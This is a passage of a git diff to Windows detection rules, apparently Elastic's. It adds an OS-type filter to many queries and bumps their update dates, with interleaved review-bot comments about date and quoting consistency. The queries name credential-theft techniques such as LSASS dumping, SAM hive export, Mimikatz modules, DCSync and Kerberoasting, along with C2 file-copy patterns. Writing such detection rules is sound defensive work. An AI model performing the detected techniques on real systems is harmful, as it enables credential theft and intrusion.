+++ b/rules/windows/command_and_control_remote_file_copy_powershell.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/30"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -74,10 +74,10 @@ type = "eql"
 query = '''
 sequence by host.id, process.entity_id with maxspan=30s
- [network where process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and network.protocol == "dns" and
+ [network where host.os.type == "windows" and process.name : ("powershell.exe", "pwsh.exe", "powershell_ise.exe") and network.protocol == "dns" and
 not dns.question.name : ("localhost", "*.microsoft.com", "*.azureedge.net", "*.powershellgallery.com", "*.windowsupdate.com", "metadata.google.internal") and
 not user.domain : "NT AUTHORITY"]
- [file where process.name : "powershell.exe" and event.type == "creation" and file.extension : ("exe", "dll", "ps1", "bat") and
+ [file where host.os.type == "windows" and process.name : "powershell.exe" and event.type == "creation" and file.extension : ("exe", "dll", "ps1", "bat") and
 not file.name : "__PSScriptPolicy*.ps1"]
 '''
diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml
index 2dd64b4ff..7618f6ed3 100644
--- a/rules/windows/command_and_control_remote_file_copy_scripts.toml
+++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/29"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -75,10 +75,10 @@ type = "eql"
 query = '''
 sequence by host.id, process.entity_id
- [network where process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and
+ [network where host.os.type == "windows" and process.name : ("wscript.exe", "cscript.exe") and network.protocol != "dns" and
 network.direction : ("outgoing", "egress") and network.type == "ipv4" and destination.ip != "127.0.0.1"
 ]
- [file where event.type == "creation" and file.extension : ("exe", "dll")]
+ [file where host.os.type == "windows" and event.type == "creation" and file.extension : ("exe", "dll")]
 '''
diff --git a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml
index 3191d0ce0..0a61052e0 100644
--- a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml
+++ b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml
@@ -2,7 +2,7 @@ creation_date = "2020/12/14"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -78,7 +78,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-network where event.type == "protocol" and network.protocol == "http" and
+network where host.os.type == "windows" and event.type == "protocol" and network.protocol == "http" and
 process.name : ("ConfigurationWizard.exe",
 "NetFlowService.exe",
 "NetflowDatabaseMaintenance.exe",
diff --git a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml
index 8021435f0..558c5f5f0 100644
--- a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml
+++ b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml
@@ -2,7 +2,7 @@ creation_date = "2020/09/02"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -86,7 +86,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "creation" and process.name : "TeamViewer.exe" and
+file where host.os.type == "windows" and event.type == "creation" and process.name : "TeamViewer.exe" and
 file.extension : ("exe", "dll", "scr", "com", "bat", "ps1", "vbs", "vbe", "js", "wsh", "hta")
 '''
diff --git a/rules/windows/credential_access_bruteforce_admin_account.toml b/rules/windows/credential_access_bruteforce_admin_account.toml
index 3567483e8..d3fa2abc9 100644
--- a/rules/windows/credential_access_bruteforce_admin_account.toml
+++ b/rules/windows/credential_access_bruteforce_admin_account.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
 [rule]
 author = ["Elastic"]
@@ -80,7 +80,7 @@ type = "eql"
 query = '''
 sequence by winlog.computer_name, source.ip with maxspan=10s
- [authentication where event.action == "logon-failed" and
+ [authentication where host.os.type == "windows" and event.action == "logon-failed" and
 winlog.logon.type : "Network" and
 source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and
 user.name : "*admin*" and
diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml
index 2ee1edfbc..62e4d75a4 100644
--- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml
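Review bot: `updated_date` in credential_access_bruteforce_admin_account.toml is bumped to "2023/03/02" while every other rule in this commit moves to "2023/02/22", and the same later date appears in credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml and credential_access_bruteforce_multiple_logon_failure_same_srcip.toml. The query change in these three files is the same `host.os.type == "windows"` addition made elsewhere, so the divergent date looks like a rebase or merge artifact rather than a deliberate later revision; if so, align it with `updated_date = "2023/02/22"`. The enclosing sequence query continues past the end of the hunk.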
+++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_followed_by_success.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
 [rule]
 author = ["Elastic"]
@@ -84,7 +84,7 @@ type = "eql"
 query = '''
 sequence by winlog.computer_name, source.ip with maxspan=5s
- [authentication where event.action == "logon-failed" and
+ [authentication where host.os.type == "windows" and event.action == "logon-failed" and
 /* event 4625 need to be logged */
 winlog.logon.type : "Network" and
 source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and
@@ -92,7 +92,7 @@ sequence by winlog.computer_name, source.ip with maxspan=5s
 /* noisy failure status codes often associated to authentication misconfiguration */
 not winlog.event_data.Status : ("0xC000015B", "0XC000005E", "0XC0000133", "0XC0000192")] with runs=5
- [authentication where event.action == "logged-in" and
+ [authentication where host.os.type == "windows" and event.action == "logged-in" and
 /* event 4624 need to be logged */
 winlog.logon.type : "Network" and
 source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and
diff --git a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml
index f8489c305..fa5c8bf4d 100644
--- a/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml
+++ b/rules/windows/credential_access_bruteforce_multiple_logon_failure_same_srcip.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/09"
+updated_date = "2023/03/02"
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,7 @@ type = "eql"
 query = '''
 sequence by winlog.computer_name, source.ip with maxspan=10s
- [authentication where event.action == "logon-failed" and
+ [authentication where host.os.type == "windows" and event.action == "logon-failed" and
 /* event 4625 need to be logged */
 winlog.logon.type : "Network" and source.ip != null and source.ip != "127.0.0.1" and source.ip != "::1" and
diff --git a/rules/windows/credential_access_cmdline_dump_tool.toml b/rules/windows/credential_access_cmdline_dump_tool.toml
index d45678412..ebe40934f 100644
--- a/rules/windows/credential_access_cmdline_dump_tool.toml
+++ b/rules/windows/credential_access_cmdline_dump_tool.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/19"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -72,7 +72,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 /* update here with any new lolbas with dump capability */
 (process.pe.original_file_name == "procdump" and process.args : "-ma") or
diff --git a/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
index c82366a01..873b1d42b 100644
--- a/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
+++ b/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic", "Austin Songer"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (
 (process.pe.original_file_name in ("Cmd.Exe", "PowerShell.EXE", "XCOPY.EXE") and
 process.args : ("copy", "xcopy", "Copy-Item", "move", "cp", "mv")
diff --git a/rules/windows/credential_access_credential_dumping_msbuild.toml b/rules/windows/credential_access_credential_dumping_msbuild.toml
index e9887f421..05b86d3db 100644
--- a/rules/windows/credential_access_credential_dumping_msbuild.toml
+++ b/rules/windows/credential_access_credential_dumping_msbuild.toml
@@ -2,7 +2,7 @@ creation_date = "2020/03/25"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -79,8 +79,8 @@ type = "eql"
 query = '''
 sequence by process.entity_id
- [process where event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe")]
- [any where (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
+ [process where host.os.type == "windows" and event.type == "start" and (process.name : "MSBuild.exe" or process.pe.original_file_name == "MSBuild.exe")]
+ [any where host.os.type == "windows" and (event.category == "library" or (event.category == "process" and event.action : "Image loaded*")) and
 (dll.name : ("vaultcli.dll", "SAMLib.DLL") or file.name : ("vaultcli.dll", "SAMLib.DLL"))]
 '''
diff --git a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml
index 22df74f73..1afde324d 100644
--- a/rules/windows/credential_access_dcsync_newterm_subjectuser.toml
+++ b/rules/windows/credential_access_dcsync_newterm_subjectuser.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "The New Term rule type used in this rule was added in Elastic 8.4"
 min_stack_version = "8.4.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -52,9 +52,11 @@ timestamp_override = "event.ingested"
 type = "new_terms"
 query = '''
-event.action : "Directory Service Access" and event.code : "4662" and
- winlog.event_data.Properties : (*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and
- not winlog.event_data.SubjectUserName : (*$ or MSOL_*)
+event.action:"Directory Service Access" and host.os.type:windows and event.code:"4662" and
+ winlog.event_data.Properties:(*DS-Replication-Get-Changes* or *DS-Replication-Get-Changes-All* or
+ *DS-Replication-Get-Changes-In-Filtered-Set* or *1131f6ad-9c07-11d1-f79f-00c04fc2dcd2* or
+ *1131f6aa-9c07-11d1-f79f-00c04fc2dcd2* or *89e95b76-444d-4c62-991a-0facbeda640c*) and
+ not winlog.event_data.SubjectUserName:(*$ or MSOL_*)
 '''
diff --git a/rules/windows/credential_access_dcsync_replication_rights.toml b/rules/windows/credential_access_dcsync_replication_rights.toml
index adff31ae1..9b685c303 100644
--- a/rules/windows/credential_access_dcsync_replication_rights.toml
+++ b/rules/windows/credential_access_dcsync_replication_rights.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
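Review bot: The rewritten KQL queries quote event.code inconsistently: `event.code:"4662"` in this new_terms hunk and `event.code:"5136"` in the shadow-credentials hunk, but unquoted `event.code:4738`, `event.code:4704` and `event.code:5136` in the Kerberos-preauth, SeEnableDelegationPrivilege and SPN-attribute hunks. As far as I can tell both forms match the same documents against a keyword-mapped field, so this is a point of style rather than correctness, but since the commit already reflows every one of these lines it is the cheapest moment to settle on one form, for example the quoted `event.code:"4662"` used here.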
@@ -98,7 +98,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where event.action == "Directory Service Access" and
+any where host.os.type == "windows" and event.action == "Directory Service Access" and
 event.code == "4662" and winlog.event_data.Properties : (
 /* Control Access Rights/Permissions Symbol */
diff --git a/rules/windows/credential_access_disable_kerberos_preauth.toml b/rules/windows/credential_access_disable_kerberos_preauth.toml
index 3735f99e1..b28249837 100644
--- a/rules/windows/credential_access_disable_kerberos_preauth.toml
+++ b/rules/windows/credential_access_disable_kerberos_preauth.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -75,7 +75,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.code:4738 and message:"'Don't Require Preauth' - Enabled"
+event.code:4738 and host.os.type:windows and message:"'Don't Require Preauth' - Enabled"
 '''
diff --git a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml
index 2c02af1ac..77b693922 100644
--- a/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml
+++ b/rules/windows/credential_access_domain_backup_dpapi_private_keys.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -37,7 +37,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type != "deletion" and file.name : ("ntds_capi_*.pfx", "ntds_capi_*.pvk")
+file where host.os.type == "windows" and event.type != "deletion" and file.name : ("ntds_capi_*.pfx", "ntds_capi_*.pvk")
 '''
diff --git a/rules/windows/credential_access_dump_registry_hives.toml b/rules/windows/credential_access_dump_registry_hives.toml
index d22d63ac8..577c684f0 100644
--- a/rules/windows/credential_access_dump_registry_hives.toml
+++ b/rules/windows/credential_access_dump_registry_hives.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -77,7 +77,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 process.pe.original_file_name == "reg.exe" and
 process.args : ("save", "export") and
 process.args : ("hklm\\sam", "hklm\\security")
diff --git a/rules/windows/credential_access_generic_localdumps.toml b/rules/windows/credential_access_generic_localdumps.toml
index ebe6e5627..b47b6fc91 100644
--- a/rules/windows/credential_access_generic_localdumps.toml
+++ b/rules/windows/credential_access_generic_localdumps.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -33,7 +33,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" and
+registry where host.os.type == "windows" and registry.path : "HKLM\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" and
 registry.data.strings : ("2", "0x00000002") and
 not (process.executable : "?:\\Windows\\system32\\svchost.exe" and user.id : ("S-1-5-18", "S-1-5-19", "S-1-5-20"))
 '''
diff --git a/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml b/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml
index 774174916..b57caf834 100644
--- a/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml
+++ b/rules/windows/credential_access_iis_apppoolsa_pwd_appcmd.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "appcmd.exe" or process.pe.original_file_name == "appcmd.exe") and
 process.args : "/list" and process.args : "/text*password"
 '''
diff --git a/rules/windows/credential_access_iis_connectionstrings_dumping.toml b/rules/windows/credential_access_iis_connectionstrings_dumping.toml
index 8656c27ce..6bd5e3aec 100644
--- a/rules/windows/credential_access_iis_connectionstrings_dumping.toml
+++ b/rules/windows/credential_access_iis_connectionstrings_dumping.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -35,7 +35,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.type == "start" and
+process where host.os.type == "windows" and event.type == "start" and
 (process.name : "aspnet_regiis.exe" or process.pe.original_file_name == "aspnet_regiis.exe") and
 process.args : "connectionStrings" and process.args : "-pdf"
 '''
diff --git a/rules/windows/credential_access_kerberoasting_unusual_process.toml b/rules/windows/credential_access_kerberoasting_unusual_process.toml
index 8a5abed0d..d3aa578c5 100644
--- a/rules/windows/credential_access_kerberoasting_unusual_process.toml
+++ b/rules/windows/credential_access_kerberoasting_unusual_process.toml
@@ -2,7 +2,7 @@ creation_date = "2020/11/02"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2023/01/31"
+updated_date = "2023/02/22"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
@@ -87,7 +87,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-network where event.type == "start" and network.direction : ("outgoing", "egress") and
+network where host.os.type == "windows" and event.type == "start" and network.direction : ("outgoing", "egress") and
 destination.port == 88 and source.port >= 49152 and process.pid != 4 and
 not process.executable : ("?:\\Windows\\System32\\lsass.exe",
diff --git a/rules/windows/credential_access_ldap_attributes.toml b/rules/windows/credential_access_ldap_attributes.toml
index 4a28b83ce..f37970ea8 100644
--- a/rules/windows/credential_access_ldap_attributes.toml
+++ b/rules/windows/credential_access_ldap_attributes.toml
@@ -4,7 +4,7 @@ integration = ["system", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/01"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -48,7 +48,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where event.action == "Directory Service Access" and event.code == "4662" and
+any where host.os.type == "windows" and event.action == "Directory Service Access" and event.code == "4662" and
 not winlog.event_data.SubjectUserSid : "S-1-5-18" and
diff --git a/rules/windows/credential_access_lsass_handle_via_malseclogon.toml b/rules/windows/credential_access_lsass_handle_via_malseclogon.toml
index 3a0bb00b5..312dc9870 100644
--- a/rules/windows/credential_access_lsass_handle_via_malseclogon.toml
+++ b/rules/windows/credential_access_lsass_handle_via_malseclogon.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-process where event.code == "10" and
+process where host.os.type == "windows" and event.code == "10" and
 winlog.event_data.TargetImage : "?:\\WINDOWS\\system32\\lsass.exe" and
 /* seclogon service accessing lsass */
diff --git a/rules/windows/credential_access_lsass_loaded_susp_dll.toml b/rules/windows/credential_access_lsass_loaded_susp_dll.toml
index ba57403c6..7b7547086 100644
--- a/rules/windows/credential_access_lsass_loaded_susp_dll.toml
+++ b/rules/windows/credential_access_lsass_loaded_susp_dll.toml
@@ -4,7 +4,7 @@ maturity = "production"
 integration = ["endpoint"]
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/28"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -34,7 +34,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-library where process.executable : "?:\\Windows\\System32\\lsass.exe" and
+library where host.os.type == "windows" and process.executable : "?:\\Windows\\System32\\lsass.exe" and
 not (dll.code_signature.subject_name : ("Microsoft Windows", "Microsoft Corporation",
diff --git a/rules/windows/credential_access_lsass_memdump_file_created.toml b/rules/windows/credential_access_lsass_memdump_file_created.toml
index 6fe0c91a1..9a68b25ac 100644
--- a/rules/windows/credential_access_lsass_memdump_file_created.toml
+++ b/rules/windows/credential_access_lsass_memdump_file_created.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/02/06"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -84,7 +84,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where file.name : ("lsass*.dmp", "dumpert.dmp", "Andrew.dmp", "SQLDmpr*.mdmp", "Coredump.dmp") and
+file where host.os.type == "windows" and file.name : ("lsass*.dmp", "dumpert.dmp", "Andrew.dmp", "SQLDmpr*.mdmp", "Coredump.dmp") and
 not (process.executable : ("?:\\Program Files\\Microsoft SQL Server\\*\\Shared\\SqlDumper.exe", "?:\\Windows\\System32\\dllhost.exe") and
 file.path : ("?:\\Program Files\\Microsoft SQL Server\\*\\Shared\\ErrorDumps\\SQLDmpr*.mdmp",
diff --git a/rules/windows/credential_access_lsass_memdump_handle_access.toml b/rules/windows/credential_access_lsass_memdump_handle_access.toml
index fb6cc1b99..e19319703 100644
--- a/rules/windows/credential_access_lsass_memdump_handle_access.toml
+++ b/rules/windows/credential_access_lsass_memdump_handle_access.toml
@@ -108,7 +108,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-any where event.action == "File System" and event.code == "4656" and
+any where host.os.type == "windows" and event.action == "File System" and event.code == "4656" and
 winlog.event_data.ObjectName : (
 "?:\\Windows\\System32\\lsass.exe",
diff --git a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml
index 501fcf769..b8cfb8edc 100644
--- a/rules/windows/credential_access_mimikatz_memssp_default_logs.toml
+++ b/rules/windows/credential_access_mimikatz_memssp_default_logs.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -76,7 +76,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where file.name : "mimilsa.log" and process.name : "lsass.exe"
+file where host.os.type == "windows" and file.name : "mimilsa.log" and process.name : "lsass.exe"
 '''
diff --git a/rules/windows/credential_access_mimikatz_powershell_module.toml b/rules/windows/credential_access_mimikatz_powershell_module.toml
index eb2b6d4d1..5401e2cec 100644
--- a/rules/windows/credential_access_mimikatz_powershell_module.toml
+++ b/rules/windows/credential_access_mimikatz_powershell_module.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
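Review bot: The credential_access_lsass_memdump_handle_access.toml section changes its query at line 108 but, unlike every other file in this diff, shows no hunk bumping `updated_date` in the [metadata] block; unless that date already read 2023/02/22 before this commit, it should be bumped alongside the query change so the rule's version metadata stays in step with its logic. The remainder of the query, including the winlog.event_data.ObjectName list, continues outside the hunk.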
@@ -96,7 +96,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text:(
 (DumpCreds and DumpCerts) or
diff --git a/rules/windows/credential_access_mod_wdigest_security_provider.toml b/rules/windows/credential_access_mod_wdigest_security_provider.toml
index d76b82fbb..96e3299f3 100644
--- a/rules/windows/credential_access_mod_wdigest_security_provider.toml
+++ b/rules/windows/credential_access_mod_wdigest_security_provider.toml
@@ -4,7 +4,7 @@ integration = ["endpoint", "windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -88,7 +88,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where event.type : ("creation", "change") and
+registry where host.os.type == "windows" and event.type : ("creation", "change") and
 registry.path : (
 "HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential",
 "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential"
diff --git a/rules/windows/credential_access_moving_registry_hive_via_smb.toml b/rules/windows/credential_access_moving_registry_hive_via_smb.toml
index 09152d849..14901d5f6 100644
--- a/rules/windows/credential_access_moving_registry_hive_via_smb.toml
+++ b/rules/windows/credential_access_moving_registry_hive_via_smb.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -69,7 +69,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-file where event.type == "creation" and
+file where host.os.type == "windows" and event.type == "creation" and
 /* regf file header */
 file.Ext.header_bytes : "72656766*" and file.size >= 30000 and
 process.pid == 4 and user.id : ("S-1-5-21*", "S-1-12-1-*")
diff --git a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml
index a51f3a202..5792108b2 100644
--- a/rules/windows/credential_access_persistence_network_logon_provider_modification.toml
+++ b/rules/windows/credential_access_persistence_network_logon_provider_modification.toml
@@ -4,7 +4,7 @@ integration = ["endpoint"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2022/12/14"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -31,7 +31,7 @@ timestamp_override = "event.ingested"
 type = "eql"
 query = '''
-registry where registry.data.strings != null and
+registry where host.os.type == "windows" and registry.data.strings != null and
 registry.path : (
 "HKLM\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath",
 "\\REGISTRY\\MACHINE\\SYSTEM\\*ControlSet*\\Services\\*\\NetworkProvider\\ProviderPath"
diff --git a/rules/windows/credential_access_posh_invoke_ninjacopy.toml b/rules/windows/credential_access_posh_invoke_ninjacopy.toml
index c57b8ff8a..9b8126f40 100644
--- a/rules/windows/credential_access_posh_invoke_ninjacopy.toml
+++ b/rules/windows/credential_access_posh_invoke_ninjacopy.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/23"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -28,7 +28,7 @@ timestamp_override = "event.ingested"
 type = "query"
 query = '''
-event.category:process and
+event.category:process and host.os.type:windows and
 powershell.file.script_block_text : (
 "StealthReadFile" or
 "StealthReadFileAddr" or
diff --git a/rules/windows/credential_access_posh_minidump.toml b/rules/windows/credential_access_posh_minidump.toml
index 5646f58fd..fe9041c13 100644
--- a/rules/windows/credential_access_posh_minidump.toml
+++ b/rules/windows/credential_access_posh_minidump.toml
@@ -4,7 +4,7 @@ integration = ["windows"]
 maturity = "production"
 min_stack_comments = "New fields added: required_fields, related_integrations, setup"
 min_stack_version = "8.3.0"
-updated_date = "2023/01/05"
+updated_date = "2023/02/22"
 [rule]
 author = ["Elastic"]
@@ -85,7 +85,7 @@ timestamp_override = "event.ingested"
 type = "query"
